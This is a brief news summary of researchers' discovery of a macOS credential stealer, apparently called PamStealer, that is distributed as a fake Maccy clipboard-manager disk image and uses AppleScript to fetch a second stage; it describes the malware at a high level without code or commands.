Researchers Discover Novel macOS Malware with Custom Credential Stealing Code
Researchers have identified a previously unseen piece of macOS malware that employs sophisticated tradecraft to infect Macs with custom-developed credential-stealing code. The malware operates in two stages.
Delivery and Execution Chain
The malware is distributed in a disk image posing as Maccy, a clipboard manager for Macs. It’s written in AppleScript and uses native Objective-C APIs to download and execute the second stage payload.
Stealth Measures and Password Validation
The malware employs unusual techniques for stealth. When double-clicked, the AppleScript opens in the macOS Script Editor, where malicious functionality is hidden. The malware also validates the target’s login password before sending it to an attacker-controlled server.
Conclusion
PamStealer combines a recently emerging delivery surface with a less familiar payload, showcasing the evolution of commodity macOS stealers towards quieter execution chains and native implementations.

